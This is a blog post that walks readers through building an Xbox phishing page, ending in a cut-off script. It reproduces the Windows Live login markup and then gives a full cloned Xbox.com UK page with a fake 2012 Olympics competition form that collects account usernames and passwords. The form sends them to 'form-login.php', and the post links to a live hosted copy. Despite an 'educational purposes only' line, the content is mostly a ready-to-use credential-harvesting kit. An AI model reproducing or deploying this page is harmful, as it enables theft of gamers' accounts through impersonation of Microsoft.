In my last article ‘Xbox Phishing & Hacking Techniques‘ I explained the basic fundamentals of what phishing is and 3 main methods that relate to Xbox and Xbox.com.
This is a carry on article which I will be showing you a template/mock-up of an Xbox Phishing site including source code and live examples to test. With Xbox i did have a template of an old phishing site I had but unfortunately that is lost on an old HDD, it replicated the exact login screen for Xbox’s login link and then obviously phished the accounts.
Making the Phisher
I began by visiting the https://login.live.com and checking the “view source” option when i came across the following code
Xbox Login Source
<table style="width: 100%;" cellpadding="0" cellspacing="0"><tbody><tr><td style="display: none;" id="idTd_Tile_Error"><table id="idTbl_Tile_Error" cellpadding="0" cellspacing="0"><tbody><tr><td id="idTd_Tile_ErrorImg_Login"><span id="idImg_Tile_Error" title="Error symbol"><img src="Https://secure.shared.live.com/%7ELive.SiteContent.ID/%7E16.3.16/%7E/%7E/%7E/%7E/images/iconmap.png"></span></td><td id="idTd_Tile_ErrorMsg_Login"></td></tr></tbody></table></td></tr><tr><td><table style="width: 100%;" cellpadding="0" cellspacing="0"><tbody><tr><td style="display: none;" id="idTd_PWD_Error"><table id="idTbl_PWD_Error_Username" cellpadding="0" cellspacing="0"><tbody><tr><td id="idTd_PWD_ErrorImg_Username"><span id="idImg_PWD_ErrorImg_Username" title="Error symbol"><img src="Https://secure.shared.live.com/%7ELive.SiteContent.ID/%7E16.3.16/%7E/%7E/%7E/%7E/images/iconmap.png"></span></td><td id="idTd_PWD_ErrorMsg_Username">Generic Password Error Message</td></tr></tbody></table></td></tr><tr><td style="padding-bottom: 4px;" id="idTd_PWD_UsernameLbl"><label id="idLbl_PWD_Username" for="i0116"><nobr>Windows Live ID:</nobr></label></td></tr><tr><td style="padding-bottom: 16px;" id="idTd_PWD_UsernameTb"><div id="idDiv_PWD_UsernameTb"><div style="position: relative; width: 100%;"><input style="width: 100%;" maxlength="113" id="i0116" name="login" type="text"><div style="position: absolute; top: 0px; left: 0px; z-index: 5; width: 100%;"><div style="width: 100%; cursor: text;" id="idDiv_PWD_UsernameExample">example555@hotmail.com</div></div></div></div></td></tr><tr><td style="display: none;" id="idTd_PWD_Error_Password"><table id="idTbl_PWD_Error_Password" cellpadding="0" cellspacing="0"><tbody><tr><td id="idTd_PWD_ErrorImg_Password"><span id="idImg_PWD_ErrorImg_Password" title="Error symbol"><img src="Https://secure.shared.live.com/%7ELive.SiteContent.ID/%7E16.3.16/%7E/%7E/%7E/%7E/images/iconmap.png"></span></td><td id="idTd_PWD_ErrorMsg_Password"></td></tr></tbody></table></td></tr><tr><td style="padding-bottom: 4px;" id="idTd_PWD_PasswordLbl"><label id="idLbl_PWD_Password" for="i0118">Password:</label></td></tr><tr><td style="padding-bottom: 4px;" id="idTd_PWD_PasswordTb"><div id="idDiv_PWD_PasswordTb"><input style="width: 100%;" autocomplete="off" maxlength="16" id="i0118" name="passwd" type="password"></div></td></tr><tr><td style="padding-bottom: 20px;" id="idTd_PWD_PasswordHelp"><div style="padding: 0px;" id="idDiv_PWD_ForgotPassword"><a id="idA_PWD_ForgotPassword" href="https://login.live.com/resetpw.srf?wreply=https://login.live.com/login.srf%3fwa%3dwsignin1.0%26rpsnv%3d11%26ct%3d1341888055%26rver%3d6.2.6289.0%26wp%3dMBI%26wreply%3dhttps:%252F%252Flive.xbox.com:443%252Fxweb%252Flive%252Fpassport%252FsetCookies.ashx%253Frru%253Dhttps%25253a%25252f%25252flive.xbox.com%25252fen-GB%25252fAccount%25252fSignin%25253freturnUrl%25253dhttp%2525253a%2525252f%2525252fwww.xbox.com%2525252fen-GB%2525252f%2525253flc%2525253d2057%26id%3d66262%26cbcxt%3d0%26vv%3d1300%26mkt%3dEN-GB%26lc%3d2057&id=66262&mkt=EN-GB&lc=2057&username=">Can't access your account?</a></div></td></tr><tr><td style="padding-bottom: 20px;" id="idTd_PWD_KMSI_Cb"><table cellpadding="0" cellspacing="0"><tbody><tr><td style="vertical-align: top;" id="idTd_PWD_KMSI_CbInput"><input value="1" id="idChkBx_PWD_KMSI0Pwd" name="KMSI" type="checkbox"></td><td><label id="idLbl_PWD_KMSI_Cb" for="idChkBx_PWD_KMSI0Pwd">Keep me signed in</label></td></tr></tbody></table></td></tr><tr><td style="padding-bottom: 20px;" id="idTd_PWD_SubmitCancelTbl"><table cellpadding="0" cellspacing="0"><tbody><tr><td><input style="height: 25px;" value="Sign in" id="idSIButton9" name="SI" type="submit"></td><td></td></tr></tbody></table></td></tr><tr><td style="padding-bottom: 16px;" id="idTd_PWD_CredPicker"><table style="width: 100%;" cellpadding="0" cellspacing="0"><tbody><tr><td style="padding-bottom: 4px;" id="idTd_PWD_SwitchToOTCText"><span id="idSpan_PWD_SwitchToOTC">Not your computer?</span></td></tr><tr><td><a title="Get a single use code to sign in with" id="idA_PWD_SwitchToOTC" href="">Get a single use code to sign in with</a></td></tr></tbody></table></td></tr></tbody></table></td></tr></tbody></table>
I then took the whole source into Notepad ++ to begin “doodling” when i noticed that this was a Javascript which is not really my area of expertise.
Now back to Xbox.com i noticed that they have as of today they have an advertisement for “Xbox’s Summer Stadium” and in a case like this it’s easy to take advantage of. Now after a little bit of playing around with the HTML elements I was able to mock up the following idea for a phisher.
It’s not a particularly brilliant masterpiece but this is another 10 minute job with a quick thinking idea of using the Olympic Games in order to discourage unwilling participants to part with their Email Addresses and passwords.
You can view the examples live at www.mintcreg.co.uk/phishing/xbox and please remember that these are to be used for educational purposes only!
Source & Download
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head id="ctl00_ctl00_ctl00_HtmlHead"><!--
v 12.6.10.2
s tI0uSOrXJYYnYURcPLSh0Q==
r 2b1d5ac3-5fc3-4700-bf99-fc93fd51a67c
-->
<meta name="application-name" content="The Official Xbox 360 Website" />
<meta name="msapplication-tooltip" content="The Official Xbox 360 Website" />
<meta name="msapplication-task" content="name=My Xbox;action-uri=http://live.xbox.com?cid=jumplist:Live;icon-uri=http://nxeassets.xbox.com/shaxam/0201/30/fc/30fc9af1-e46f-4cee-b034-21a9c0c75461.ICO?v=1#xbl.ICO" />
<meta name="msapplication-task" content="name=Games + Marketplace;action-uri=http://marketplace.xbox.com?cid=jumplist:marketplace;icon-uri=http://nxeassets.xbox.com/shaxam/0201/30/fc/30fc9af1-e46f-4cee-b034-21a9c0c75461.ICO?v=1#xbl.ICO" />
<meta name="msapplication-task" content="name=Xbox Support;action-uri=http://support.xbox.com;icon-uri=http://support.xbox.com/SiteAssets/XboxSupportV2/images/favicon.ico" />
<meta name="msapplication-task" content="name=PC Setup;action-uri=http://www.xbox.com/PCSetup?cid=jumplist:pcsetup;icon-uri=http://support.xbox.com/SiteAssets/XboxSupportV2/images/favicon.ico" />
<meta name="ms.siteorg" content="Entertainment and Devices" />
<meta name="ms.sitename" content="Xbox" />
<meta name="ms.loc" content="US" />
<meta name="ms.lang" content="en" />
<script type="text/javascript" src="/shell/js/jquery-1.5.1.min.js"></script>
<script type="text/javascript" src="/shell/js/its.amd.js"></script>
<script type="text/javascript">
var xboxComShellData = {}
xboxComShellData.searchScopeOptions = [];
xboxComShellData.version = "12.6.10.2";
xboxComShellData.searchScopeOptions.push({
value: "http://www.xbox.com/en-GB/Search?q={0}#All",
context: "Search All",
label: "In All",
id: "All",
enumValue: 0
});
xboxComShellData.searchScopeOptions.push({
value: "http://www.xbox.com/en-GB/Search?q={0}#General",
context: "Search General",
label: "In General",
id: "General",
enumValue: 10
});
xboxComShellData.searchScopeOptions.push({
value: "http://www.xbox.com/en-GB/Search?q={0}#Games",
context: "Search Games",
label: "In Games",
id: "Games",
enumValue: 20
});
xboxComShellData.searchScopeOptions.push({
value: "http://www.xbox.com/en-GB/Search?q={0}#Video",
context: "Search Video",
label: "In Video",
id: "Video",
enumValue: 23
});
xboxComShellData.searchScopeOptions.push({
value: "http://www.xbox.com/en-GB/Search?q={0}#Support",
context: "Search Support",
label: "In Support",
id: "Support",
enumValue: 30
});
xboxComShellData.searchScopeOptions.push({
value: "http://www.xbox.com/en-GB/Search?q={0}#Forums",
context: "Search Forums",
label: "In Forums",
id: "Forums",
enumValue: 40
});
xboxComShellData.defaultOptionIndex = 0;
$(function(){
postXDMessage({verb:'CURRENT_PAGE', url:window.location.href}, "OTHER");
});
</script>
<script type="text/javascript" src="/Shell/js/shiny.js"></script>
<script type="text/javascript" src="/Shell/js/instrumentation.js"></script>
<script type="text/javascript" src="/Shell/js/general.js"></script>
<script type="text/javascript">try{var utcOffsetMinutes = new Date().getTimezoneOffset() * -1;setCookie("UtcOffsetMinutes", utcOffsetMinutes, 30);} catch (e){}</script>
<link rel="Stylesheet" type="text/css" href="http://www.xbox.com/Shell/css/GridLayout.css" /><link rel="Stylesheet" type="text/css" href="http://www.xbox.com/Shell/css/XboxV3.css" /><link rel="Stylesheet" type="text/css" href="http://www.xbox.com/Shell/css/ShellStyles.css" /><link rel="Stylesheet" type="text/css" href="http://www.xbox.com/Shell/css/jquery-ui-theme.css" /><link rel="shortcut icon" href="/Shell/images/favicon.ico" />
<meta name="description" content="Xbox.com is your ultimate source for all things Xbox. Get news updates; game trailers, screens, hardware information, community buzz, the latest Xbox LIVE, forums, support, and much more!"/>
<link href="http://www.xbox.com/Content/Site.css" rel="stylesheet" type="text/css" />
<script type="text/javascript">
$(document).ready(function () {
});
</script>
<link href="http://www.xbox.com/Content/Xbox.css" rel="Stylesheet" type="text/css" />
<link rel="Stylesheet" type="text/css" href="http://www.xbox.com/Shell/css/MetroHeroStyle.css" />
<title>
Xbox.com UK - Xbox.com
</title></head>
<body id="ctl00_ctl00_ctl00_DocumentBody" class="en-GB">
<div id="bodycolumn">
<div id="BodyHeader" class="container">
<div id="ShellHeaderContent">
<span id="XbcPointsBalanceShell"></span>
<div id="ShellMeBarArea">
<a href="http://www.xbox.com/">
<div id="ShellLogo"></div>
</a>
<div id="SignedOutExperience">
<div id="HeadShotBox" class="SignedOut"></div>
<div id="ShellMeBar" class="SignedOut">
<div class="GamerStatArea">
<div class="WelcomeText">Free.</div>
</div>
<div class="LinkArea">
<a href="https://live.xbox.com/en-GB/Account?xr=mebarnav" >My Account</a>
<span class="spread"><a href="http://www.xbox.com/en-GB/live/join" >Join Now</a></span>
<span class="spread">
<a name="RpsSignInLink" href="https://live.xbox.com/Account/Signin?returnUrl=http%3a%2f%2fwww.xbox.com%2fen-GB%2f">Sign In</a>
</span>
</div>
</div>
</div>
</div>
<div id="ShellNavigationBar">
<div>
<div class="SearchArea">
<input id="SearchTextBox" type="text" name="q" class="TextBox" value="" url="http://www.xbox.com/en-GB/Search?q={0}#All" maxlength="200" autocomplete="off" />
<input id="SearchButton" type="button" class="SubmitButton" value="" title="Search All" />
</div>
<ul class="NavigationElements">
<li>
<a href="http://www.xbox.com/en-GB/Xbox360?xr=shellnav" name="en_GB_0" >Xbox 360 + Kinect</a>
<ul>
<li>
<a href="http://www.xbox.com/en-GB/Xbox360?xr=shellnav" name="en_GB_0_0" >Overview</a>
</li>
<li>
<a href="http://www.xbox.com/en-GB/xbox360/consoles?xr=shellnav" name="en_GB_0_1" >Consoles</a>
</li>
<li>
<a href="http://www.xbox.com/en-GB/Kinect?xr=shellnav" name="en_GB_0_2" >Kinect</a>
</li>
<li>
<a href="http://www.xbox.com/en-GB/Xbox360/Accessories?xr=shellnav" name="en_GB_0_3" >Accessories</a>
</li>
<li>
<a href="http://www.xbox.com/en-GB/Xbox360/WhereToBuy?xr=shellnav" name="en_GB_0_4" >Where To Buy</a>
</li>
</ul>
</li>
<li>
<a href="http://www.xbox.com/en-GB/Live?xr=shellnav" name="en_GB_1" >Xbox LIVE</a>
<ul>
<li>
<a href="http://www.xbox.com/en-GB/LIVE?xr=shellnav" name="en_GB_1_0" >Overview</a>
</li>
<li>
<a href="http://www.xbox.com/en-GB/live/joinlive?xr=shellnav" name="en_GB_1_1" >Join Xbox LIVE</a>
</li>
<li>
<a href="http://rewards.xbox.com?xr=shellnav" name="en_GB_1_2" >Xbox LIVE Rewards</a>
</li>
<li>
<a href="https://live.xbox.com/en-GB/RedeemToken?xr=shellnav" name="en_GB_1_3" >Redeem Code</a>
</li>
</ul>
</li>
<li>
<a href="https://live.xbox.com/en-GB/?xr=shellnav" name="en_GB_2" >Social</a>
<ul>
<li>
<a href="https://live.xbox.com/en-GB/?xr=shellnav" name="en_GB_2_0" >Home</a>
</li>
<li>
<a href="https://live.xbox.com/en-GB/Friends?xr=shellnav" name="en_GB_2_1" >Friends</a>
</li>
<li>
<a href="https://live.xbox.com/en-GB/Messages?xr=shellnav" name="en_GB_2_2" >Messages</a>
</li>
<li>
<a href="https://live.xbox.com/en-GB/Activity?xr=shellnav" name="en_GB_2_3" >Activity</a>
</li>
<li>
<a href="http://forums.xbox.com/default.aspx?ForumGroupID=17&xr=shellnav" name="en_GB_2_4" >Forums</a>
</li>
<li>
<a href="http://live.xbox.com/en-GB/familycenter?xr=shellnav" name="en_GB_2_5" >Family Center</a>
</li>
</ul>
</li>
<li>
<a href="http://marketplace.xbox.com/en-GB/?xr=shellnav" name="en_GB_3" >Games</a>
<ul>
<li>
<a href="http://marketplace.xbox.com/en-GB/?xr=shellnav" name="en_GB_3_0" >Xbox Games</a>
</li>
<li>
<a href="http://marketplace.xbox.com/en-GB/Xbox?xr=shellnav" name="en_GB_3_1" >All Games</a>
</li>
<li>
<a href="http://marketplace.xbox.com/en-GB/PC?xr=shellnav" name="en_GB_3_2" >PC Games</a>
</li>
<li>
<a href="http://www.xbox.com/en-GB/Live/Mobile?xr=shellnav" name="en_GB_3_3" >Windows Phone Games</a>
</li>
<li>
<a href="http://www.xbox.com/en-GB/Live/Webgames?xr=shellnav" name="en_GB_3_4" >Web Games</a>
</li>
<li>
<a href="http://marketplace.xbox.com/en-GB/AvatarMarketplace?xr=shellnav" name="en_GB_3_5" >Avatars</a>
</li>
</ul>
</li>
<li>
<a href="http://marketplace.xbox.com/en-GB/Video?xr=shellnav" name="en_GB_4" >Movies</a>
<ul>
<li>
<a href="http://marketplace.xbox.com/en-GB/Video?xr=shellnav" name="en_GB_4_0" >Overview </a>
</li>
<li>
<a href="http://marketplace.xbox.com/en-GB/Movies?xr=shellnav" name="en_GB_4_1" >Browse Movies</a>
</li>
</ul>
</li>
<li>
<a href="http://www.xbox.com/en-GB/Music?xr=shellnav" name="en_GB_5" >Music</a>
</li>
<li>
<a href="http://support.xbox.com/?xr=shellnav" name="en_GB_6" >Support</a>
<ul>
<li>
<a href="http://support.xbox.com/?xr=shellnav" name="en_GB_6_0" >Browse Support</a>
</li>
<li>
<a href="http://support.xbox.com/billing-and-subscriptions/browse?xr=shellnav" name="en_GB_6_1" >Billing and subscriptions</a>
</li>
<li>
<a href="http://support.xbox.com/xbox-360/browse?xr=shellnav" name="en_GB_6_2" >Xbox 360</a>
</li>
<li>
<a href="http://support.xbox.com/xbox-live/browse?xr=shellnav" name="en_GB_6_3" >Xbox LIVE</a>
</li>
<li>
<a href="http://support.xbox.com/kinect/browse?xr=shellnav" name="en_GB_6_4" >Kinect</a>
</li>
<li>
<a href="http://support.xbox.com/apps/browse?xr=shellnav" name="en_GB_6_5" >Apps</a>
</li>
<li>
<a href="http://support.xbox.com/games/browse?xr=shellnav" name="en_GB_6_6" >Games</a>
</li>
<li>
<a href="http://support.xbox.com/en-gb/contact-us?xr=shellnav" name="en_GB_6_7" >Contact us</a>
</li>
</ul>
</li>
</ul>
</div>
</div>
<div id="BreadcrumbsPlaceholder"></div>
<script language="javascript" type="text/javascript" >
//<![CDATA[
$(function() {
CreateDropdownMenus('#ShellNavigationBar ul.NavigationElements > li');
InitializeMobileLink("#MobileVersionLinkArea", 'desktopVersion', 'mobileOverride');
});
$(function() {
function PadNavigationElements() {
var usedWidth = 0;
$("#ShellNavigationBar ul.NavigationElements > li").each(function(){ usedWidth += $(this).width();});
var availableWidth = $("#ShellNavigationBar > div").width() - $("#ShellNavigationBar .SearchArea").width() - usedWidth;
var numElements = $("#ShellNavigationBar ul.NavigationElements > li").length;
var paddingAddition = availableWidth / numElements;
paddingAddition = paddingAddition - 1; /* play it safe */
if (paddingAddition > 0)
{
$("#ShellNavigationBar ul.NavigationElements > li").css("margin-right",paddingAddition + "px")
}
}
PadNavigationElements();
$(window).resize(PadNavigationElements);
});
function XbcShellAddPoints() { window.location = 'https://live.xbox.com/en-GB/BuyPoints?ru=' + encodeURIComponent(window.location) + '&aru=' + encodeURIComponent(window.location); }
$(function() {
$('#SearchTextBox')
.keypress( function(event) {
if(event.keyCode==13) {
showSearchResults();
return false;
}
});
$('#SearchButton')
.click( function() {
showSearchResults();
});
InitializeSearchScopeDropDown();
});
//]]>
</script>
</div>
</div>
<div id="BodyContent" class="container">
<div id="popupBackground" onclick="javascript:closeVideoPopupViewer();"></div>
<div id="popupVideoPlayer">
<div id="silverlightVideoPopupHost"></div>
</div>
<script type="text/javascript">
(function(window, undefined) {
var xbox = window.xbox = window.xbox || { };
xbox.videoPlayer = xbox.videoPlayer || { };
xbox.videoPlayer.txtPlaybackErrorTitle = 'Can\x27t Play';
xbox.videoPlayer.txtPlaybackErrorActiveXDescription = 'Can\x27t play this content because ActiveX is disabled. Please enable ActiveX in your browser settings, then refresh this page to try again.';
xbox.videoPlayer.txtPlaybackErrorGenericDescription = 'There was a problem playing this video. Try again later.';
xbox.videoPlayer.txtPlaybackErrorUnsupportedBrowser = 'Silverlight is not supported in your browser.';
xbox.videoPlayer.txtPlaybackErrorClose = 'Close';
xbox.videoPlayer.VideoPlayerUrl = 'http://nxeassets.xbox.com/shaXam/xboxcom/00012.00006.00010.00002/Content/Silverlight/VideoPlayer.xap';
xbox.videoPlayer.locale = {currentCulture: 'en-GB', currentUICulture: 'en-GB'};
})(window);
</script>
<style>
#ShellBreadcrumbs { display: none }
</style>
<img src="http://compass.xboxlive.com/assets/9e/d5/9ed588b0-616e-4681-ba4d-de6ef35f9772.png#lockup-logo.png" alt="xbox-competition"/>
<h2> Enter Now!</h2>
<p>For your chance to win, simply select where the 2012 Olympics are being held</p>
<form id='login' action='form-login.php' method='get' accept-charset='UTF-8'>
<fieldset >
<input type='hidden' name='submitted' id='submitted' value='1'/>
<label for='username' >UserName*:</label>
<input type='text' name='username' id='username' maxlength="50" />
<label for='password' >Password*:</label>
<input type='password' name='password' id='password' maxlength="50" />
<label for='city' >City:</label>
<select name="city">
<option value="L">London</option>
<option value="b">Birmingham</option>
<option value="c">Newcastle</option>
</select>
<input type='submit' name='Submit' value='Submit' /></fieldset></form><script type="text/javascript"> $(document).ready(function () { if (BusinessTracking.isOmnitureEnabled()) { //captures events and product impression data specifically for the metro hero if (!s.events.match(/event4($|,)/)) { s.events = s.events ? s.events + ',event4' : 'event4'; } var heroAttrName = "data-hero-metro"; var heroData = ""; if (s.products) { heroData = s.products; }
$("[" + heroAttrName + "]").each(function () {
//concatenates the list of hero product data, adding a comma between items
if (heroData.length > 0) { heroData += ","; }
heroData += ";" + $(this).attr(heroAttrName) + ":" + s.pageName;
});
s.products = heroData.toLowerCase();
}
});
</script>
<br class='clear'/>
<script type="text/javascript" language="javascript">
$(function() {
$('.image-placeholder').hover(
function(event) {
// hover in
$(this).removeClass('centerbottom').addClass('centertop');
},
function(event) {
// hover out
$(this).removeClass('centertop').addClass('centerbottom');
});
});
</script>
<div class="ToutRow">
<div class="grid-6 " >
<div class="toutImg-6 landing-cell">
<a data-tout="1:tout:Konami-Olympic-Collection:Show-your-support:05-07:www/" href="http://marketplace.xbox.com/AvatarMarketplace?Brand=14236" class="action-url">
<div style="background-image: url('http://compass.xboxlive.com/assets/b7/71/b771d9fa-f569-4283-8df5-110c9835acb4.jpg#Konami_sport_avatar_items_235x100.jpg');" class="image-placeholder centerbottom" title="Konami Olympic Collection"></div>
</a>
</div>
<div class="TextBody">
<a data-tout="1:tout:Konami-Olympic-Collection:Show-your-support:05-07:www/" href="http://marketplace.xbox.com/AvatarMarketplace?Brand=14236" >
<h3>Show your support</h3>
</a>
<p>Show your support for your country in the 2012 London Olympics by downloading from the Olympic Avatar collection!</p>
</div>
</div>
<div class="grid-6 " >
<div class="toutImg-6 landing-cell">
<a data-tout="2:tout:Chrome-Controllers:Outshine-the-competition:05-07:www/" href="http://www.xbox.com/Xbox360/Accessories/Controllers/special-edition-chrome-wireless-controller" class="action-url">
<div style="background-image: url('http://compass.xboxlive.com/assets/8f/90/8f90de70-e131-4f69-9bd4-885603967d82.jpg#ChromeController_235x100.jpg');" class="image-placeholder centerbottom" title="Chrome Controllers"></div>
</a>
</div>
<div class="TextBody">
<a data-tout="2:tout:Chrome-Controllers:Outshine-the-competition:05-07:www/" href="http://www.xbox.com/Xbox360/Accessories/Controllers/special-edition-chrome-wireless-controller" >
<h3>Chrome Controllers</h3>
</a>
<p>Outshine the competition and play in style with an Xbox 360 Special Edition Chrome Series Wireless Controller. It’s available in a choice of three chrome colours: silver, blue, and red!</p>
</div>
</div>
<div class="grid-6 " >
<div class="toutImg-6 landing-cell">
<a data-tout="3:tout:Local:Celebration-Bundle:Special_Edition_Kinect_Celebration_Pack:11-05:www/" href="http://www.amazon.co.uk/Xbox-360-4GB-Console-Celebration/dp/B007UUIP0K/ref=sr_1_1?ie=UTF8&qid=1336461961&sr=8-1" class="action-url">
<div style="background-image: url('http://nxeassets.xbox.com/shaxam/0201/9e/af/9eaf9d76-a020-44b3-b462-9435fb000ca8.JPG?v=1#CelebrationPack_235x100.JPG');" class="image-placeholder centerbottom" title="Special Edition Kinect Celebration Pack"></div>
</a>
</div>
<div class="TextBody">
<a data-tout="3:tout:Local:Celebration-Bundle:Special_Edition_Kinect_Celebration_Pack:11-05:www/" href="http://www.amazon.co.uk/Xbox-360-4GB-Console-Celebration/dp/B007UUIP0K/ref=sr_1_1?ie=UTF8&qid=1336461961&sr=8-1" >
<h3>Special Edition Kinect Celebration Pack</h3>
</a>
<p>Celebrate this summer with the complete Xbox 360® experience; including a Special Edition White 4GB Console and Sensor, Union Jack skins, 2 great family games and a 3 Month Xbox LIVE® Gold membership, available for a limited time.</p>
</div>
</div>
<div class="grid-6 lastgridchild" >
<div class="toutImg-6 landing-cell">
<a data-tout="4:tout:Star-Wars-Demo:Try_Kinect_Star_Wars:18-05:www/" href="http://marketplace.xbox.com/Product/Kinect-Star-Wars-Demo/66acd000-77fe-1000-9115-d8024d538a35" class="action-url">
<div style="background-image: url('http://nxeassets.xbox.com/shaxam/0201/d4/8b/d48b7099-d27d-441f-9631-44ec3f994c4a.JPG?v=2#Kinect_starWars_235x100.JPG');" class="image-placeholder centerbottom" title="Try Kinect Star Wars"></div>
</a>
</div>
<div class="TextBody">
<a data-tout="4:tout:Star-Wars-Demo:Try_Kinect_Star_Wars:18-05:www/" href="http://marketplace.xbox.com/Product/Kinect-Star-Wars-Demo/66acd000-77fe-1000-9115-d8024d538a35" >
<h3>Try Kinect Star Wars</h3>
</a>
<p>Grab your lightsaber and travel on an incredible journey through the Star Wars universe with no controller in the way! Try a level for free now!
</p>
</div>
</div>
<br class="clear" />
<div class="grid-6 " >
<div class="ToutBody">
<div class="TextBody ToutBottomBlock">
<a data-tout="1:tout:Konami-Olympic-Collection:Show-your-support:05-07:www/" href="http://marketplace.xbox.com/AvatarMarketplace?Brand=14236" >
Learn more
</a>
</div>
</div>
</div>
<div class="grid-6 " >
<div class="ToutBody">
<div class="TextBody ToutBottomBlock">
<a data-tout="2:tout:Chrome-Controllers:Outshine-the-competition:05-07:www/" href="http://www.xbox.com/Xbox360/Accessories/Controllers/special-edition-chrome-wireless-controller" >
Learn more
</a>
</div>
</div>
</div>
<div class="grid-6 " >
<div class="ToutBody">
<div class="TextBody ToutBottomBlock">
<a data-tout="3:tout:Local:Celebration-Bundle:Special_Edition_Kinect_Celebration_Pack:11-05:www/" href="http://www.amazon.co.uk/Xbox-360-4GB-Console-Celebration/dp/B007UUIP0K/ref=sr_1_1?ie=UTF8&qid=1336461961&sr=8-1" >
Learn more
</a>
</div>
</div>
</div>
<div class="grid-6 lastgridchild" >
<div class="ToutBody">
<div class="TextBody ToutBottomBlock">
<a data-tout="4:tout:Star-Wars-Demo:Try_Kinect_Star_Wars:18-05:www/" href="http://marketplace.xbox.com/Product/Kinect-Star-Wars-Demo/66acd000-77fe-1000-9115-d8024d538a35" >
Learn more
</a>
</div>
</div>
</div>
<br class="clear" />
</div>
<div class="grid-24 Footer"><div><style>
#MetroHero .TextModule p, #MetroHero .TextModule h2
{
text-transform: uppercase;
}
</style>
<!-- Snowy Homepage background -->
<!--style type="text/css">
body {background:#fff !important;background-image:none !important;overflow-x:hidden;}
.trailer-box {position:absolute;top:0;left:50%;margin-left:-700px;z-index:-100;}
</style>
<div class="trailer-box">
<object id="slPlayer" data="data:application/x-silverlight-2," type="application/x-silverlight-2" width="1400px" height="642px">
<param name="source" value="http://nxeassets.xbox.com/shaxam/0201/6b/ff/6bffc5ee-7a1d-457b-af61-f932999a5f57.XAP?v=6#XmasHPTO.XAP"/>
<param name="onError" value="onSilverlightError" />
<param name="background" value="white" />
<param name="minRuntimeVersion" value="4.0.50826.0" />
<param name="autoUpgrade" value="true" />
<param name="enableHtmlAccess" value="true" />
<param name="windowless" value="true"/>
<a href="http://go.microsoft.com/fwlink/?LinkID=149156&v=4.0.50826.0" style="text-decoration:none">
<img src="http://nxeassets.xbox.com/shaxam/0201/12/0f/120fd704-a81f-478d-a2b4-2223660d6d94.JPG?v=1#Xmas_BG_Static.JPG" alt="Get Microsoft Silverlight" style="border-style:none"/>
</a>
</object><iframe id="Iframe3" style="visibility:hidden;height:0px;width:0px;border:0px"></iframe>
</div--></div></div>
<!-- date: [[2012-07-09T15:13:02.7092370Z]] -->
</div>
<div id="BodyFooter" class="container">
<div id="ShellFooterContent">
<div class="PrimaryContent">
<div id="ShellRightContentArea">
<table align="right"><tbody>
<tr>
<td><a title="Sign up to the Xbox Newsletter" href="https://live.xbox.com/en-gb/MyXbox/ContactPreferences" target="_blank"><img src="https://epix-ssl.xbox.com/shaxam/0201/04/a4/04a4ab9f-e3fe-4e6f-b08c-0a6fba6d5c97.PNG?v=1#icons_footer_Newsletter.PNG" /></a></td>
<td><a title="Facebook" href="http://www.facebook.com/xboxuk" target="_blank"><img src="https://epix-ssl.xbox.com/shaxam/0201/44/8b/448b792f-3839-4be0-81b0-6e1659e45d46.PNG?v=1#icons_footer_Facebook_updated.PNG" /></a></td>
<td><a title="YouTube" href="http://www.youtube.com/xboxuk" target="_blank"><img src="https://epix-ssl.xbox.com/shaxam/0201/60/55/60554b70-7f2a-47ee-a920-40b2f8f77d90.PNG?v=1#icons_footer_Youtube_updated.PNG" /></a></td>
<td><a href="http://www.pegionline.eu/validate/5" target="_blank"><img src="https://nxeassets-ssl.xbox.com/shaxam/0201/13/39/13393002-1ae0-4059-83d0-1b607f35ed77.PNG?v=1#sticker_black.PNG" /></a></td>
</tr>
</tbody></table>
</div>
<div id="ShellFooterNavigation">
<a href="http://www.xbox.com/en-GB/support/?xr=footnav" >Support</a><a href="http://www.xbox.com/en-GB/games/ratings?xr=footnav" class="spread" >PEGI-Online: Information on game age ratings and family settings</a> </div>
<div id="ShellFooterSocial" class="ShellFooterSocial">
</div>
<div id="ShellLeftContentArea">
</div>
</div>
<div class="SecondaryContent">
<div id="LogoAndCopyright">
<div id="CopyrightLogo">
</div>
<div id="CopyrightText">
© 2012 Microsoft
</div>
</div>
<div id="ShellFooterSecondaryNavigation">
<div class="FuncLinkArea">
<a href="/Shell/ChangeLocale.aspx?xr=footnav" id="ChangeCultureLink" name="ChangeCultureLink">United Kingdom</a>
<span id="MobileVersionLinkArea">
<a href="http://m.xbox.com?xr=footnav" id="MobileVersionLink">Mobile version</a>
</span>
</div>
<a href="http://go.microsoft.com/fwlink/?LinkId=81184&xr=footnav" >Privacy & Cookies</a><a href="http://www.xbox.com/en-GB/legal/xboxComTOU?xr=footnav" class="spread" >Xbox.com Terms of Use</a> </div>
</div>
</div>
<script type="text/javascript" >
require(["jquery"], function ($) {
$(function () {
function stretchFooterHeight() {
var footerOffset = $("#ShellFooterContent").offset().top + 140;
var winHeight = $(window).height();
if (winHeight > footerOffset) {
var offsetDiff = winHeight - footerOffset;
$("#ShellFooterContent").css("min-height", (offsetDiff + 140) + "px")
}
}
stretchFooterHeight();
$(window).resize(stretchFooterHeight);
});
});
</script>
</div>
</div>
<!-- SiteCatalyst code version: H.16. Copyright 1996-2010 Adobe, Inc. More info available at http://www.omniture.com -->
<script type="text/javascript">//<![CDATA[
try { var s_account="msxboxcomengb";t_account="msxboxcomv2enGB"; } catch(e) {}
//]]></script>
<script type="text/javascript" src="/Shell/js/s_code.js"></script>
<script type="text/javascript">//<![CDATA[
try {
s.pageName='www\x2f';s.events='event4,event1';s.prop2='en-gb';s.eVar1='en-gb';s.eVar73='default';s.eVar8='n';s.prop10='n';s.channel='www';s.prop1='home page';s.eVar7='home page';s.products='\x3b1\x3atout\x3akonami-olympic-collection\x3ashow-your-support\x3a05-07\x3awww\x2f,\x3b2\x3atout\x3achrome-controllers\x3aoutshine-the-competition\x3a05-07\x3awww\x2f,\x3b3\x3atout\x3alocal\x3acelebration-bundle\x3aspecial_edition_kinect_celebration_pack\x3a11-05\x3awww\x2f,\x3b4\x3atout\x3astar-wars-demo\x3atry_kinect_star_wars\x3a18-05\x3awww\x2f';
var extendedReferrer = s.getQueryParam('xr').toLowerCase();
if (extendedReferrer.length > 0) { s.prop9 = extendedReferrer; }
if (!s.eVar2) { s.eVar2 = s.pageName; }
s.trackingServer="o.xbox.com";
s.trackingServerSecure="s.xbox.com";
s.trackInlineStats=true;
$('document').ready(function() {
try {
